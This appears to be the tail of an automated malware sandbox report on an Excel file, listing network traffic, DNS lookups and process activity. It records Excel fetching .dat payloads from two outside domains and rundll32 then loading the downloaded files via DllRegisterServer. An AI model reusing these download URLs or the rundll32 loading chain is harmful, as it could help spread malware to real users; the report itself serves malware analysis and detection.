                                                                                                                                                              Feb 22, 2021 22:59:09.271495104 CET53588238.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:10.868465900 CET5756853192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:10.917069912 CET53575688.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:12.576550961 CET5054053192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:12.633459091 CET53505408.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:14.355530977 CET5436653192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:14.412751913 CET53543668.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:21.966629982 CET5303453192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:22.025055885 CET53530348.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:24.180893898 CET5776253192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:24.232321024 CET53577628.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:41.845082045 CET5543553192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:41.893641949 CET53554358.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:45.007247925 CET5071353192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:45.058765888 CET53507138.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:52.930275917 CET5613253192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:52.981785059 CET53561328.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 22:59:59.836127043 CET5898753192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 22:59:59.887648106 CET53589878.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 23:00:07.066653967 CET5657953192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 23:00:07.129364014 CET53565798.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 23:00:36.076194048 CET6063353192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 23:00:36.127743959 CET53606338.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 23:00:37.906385899 CET6129253192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 23:00:37.978075027 CET53612928.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 23:01:38.003408909 CET6361953192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 23:01:38.161051989 CET53636198.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 23:01:38.615238905 CET6493853192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 23:01:38.698090076 CET53649388.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 23:01:39.386435032 CET6194653192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 23:01:39.437055111 CET53619468.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 23:01:39.848022938 CET6491053192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 23:01:39.905940056 CET53649108.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 23:01:40.298046112 CET5212353192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 23:01:40.357928038 CET53521238.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 23:01:40.822685957 CET5613053192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 23:01:40.883157015 CET53561308.8.8.8192.168.2.3
                                                                                                                                                              Feb 22, 2021 23:01:41.334503889 CET5633853192.168.2.38.8.8.8
                                                                                                                                                              Feb 22, 2021 23:01:41.391504049 CET53563388.8.8.8192.168.2.3

                                                                                                                                                              DNS Queries

                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                              Feb 22, 2021 22:59:02.776334047 CET192.168.2.38.8.8.80x85d0Standard query (0)dindorf.com.arA (IP address)IN (0x0001)
                                                                                                                                                              Feb 22, 2021 22:59:04.648597002 CET192.168.2.38.8.8.80xc6feStandard query (0)7ruzezendegi.comA (IP address)IN (0x0001)
                                                                                                                                                              Feb 22, 2021 22:59:05.311264992 CET192.168.2.38.8.8.80xb95bStandard query (0)miaovideo.comA (IP address)IN (0x0001)

                                                                                                                                                              DNS Answers

                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                              Feb 22, 2021 22:59:02.956057072 CET8.8.8.8192.168.2.30x85d0No error (0)dindorf.com.ar181.88.192.136A (IP address)IN (0x0001)
                                                                                                                                                              Feb 22, 2021 22:59:04.837488890 CET8.8.8.8192.168.2.30xc6feNo error (0)7ruzezendegi.com185.159.153.72A (IP address)IN (0x0001)
                                                                                                                                                              Feb 22, 2021 22:59:05.626641989 CET8.8.8.8192.168.2.30xb95bNo error (0)miaovideo.com112.125.131.128A (IP address)IN (0x0001)

                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                              • dindorf.com.ar
                                                                                                                                                              • 7ruzezendegi.com

                                                                                                                                                              HTTP Packets

                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              0192.168.2.349710181.88.192.13680C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Feb 22, 2021 22:59:03.225424051 CET1203OUTGET /ntpnttfypqs/44249957660300900000.dat HTTP/1.1
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                              Host: dindorf.com.ar
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Feb 22, 2021 22:59:04.631943941 CET1227INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 22 Feb 2021 21:59:04 GMT
                                                                                                                                                              Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Vary: User-Agent
                                                                                                                                                              Server: FlowBalancer
                                                                                                                                                              X-Cache-Status: MISS


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              1192.168.2.349713185.159.153.7280C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Feb 22, 2021 22:59:04.982100964 CET1229OUTGET /samsgtlfwzt/44249957660300900000.dat HTTP/1.1
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                              Host: 7ruzezendegi.com
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Feb 22, 2021 22:59:05.122201920 CET1230INHTTP/1.1 302 Found
                                                                                                                                                              Date: Mon, 22 Feb 2021 21:59:04 GMT
                                                                                                                                                              Server: Apache
                                                                                                                                                              Location: http://7ruzezendegi.com/cgi-sys/suspendedpage.cgi
                                                                                                                                                              Content-Length: 233
                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 37 72 75 7a 65 7a 65 6e 64 65 67 69 2e 63 6f 6d 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://7ruzezendegi.com/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>
                                                                                                                                                              Feb 22, 2021 22:59:05.124562979 CET1231OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                              Host: 7ruzezendegi.com
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Feb 22, 2021 22:59:05.286747932 CET1231INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 22 Feb 2021 21:59:04 GMT
                                                                                                                                                              Server: Apache
                                                                                                                                                              Keep-Alive: timeout=5, max=99
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Content-Type: text/html


                                                                                                                                                              Code Manipulations

                                                                                                                                                              Statistics

                                                                                                                                                              Behavior

                                                                                                                                                              Click to jump to process

                                                                                                                                                              System Behavior

                                                                                                                                                              General

                                                                                                                                                              Start time:22:58:57
                                                                                                                                                              Start date:22/02/2021
                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                              Imagebase:0x260000
                                                                                                                                                              File size:27110184 bytes
                                                                                                                                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:22:59:25
                                                                                                                                                              Start date:22/02/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:rundll32 ..\JDFR.hdfgr,DllRegisterServer
                                                                                                                                                              Imagebase:0x1360000
                                                                                                                                                              File size:61952 bytes
                                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:22:59:26
                                                                                                                                                              Start date:22/02/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:rundll32 ..\JDFR.hdfgr1,DllRegisterServer
                                                                                                                                                              Imagebase:0x1360000
                                                                                                                                                              File size:61952 bytes
                                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:22:59:29
                                                                                                                                                              Start date:22/02/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:rundll32 ..\JDFR.hdfgr2,DllRegisterServer
                                                                                                                                                              Imagebase:0x1360000
                                                                                                                                                              File size:61952 bytes
                                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:22:59:29
                                                                                                                                                              Start date:22/02/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:rundll32 ..\JDFR.hdfgr3,DllRegisterServer
                                                                                                                                                              Imagebase:0x1360000
                                                                                                                                                              File size:61952 bytes
                                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:22:59:30
                                                                                                                                                              Start date:22/02/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:rundll32 ..\JDFR.hdfgr4,DllRegisterServer
                                                                                                                                                              Imagebase:0x1360000
                                                                                                                                                              File size:61952 bytes
                                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              Disassembly

                                                                                                                                                              Code Analysis

                                                                                                                                                              Reset < >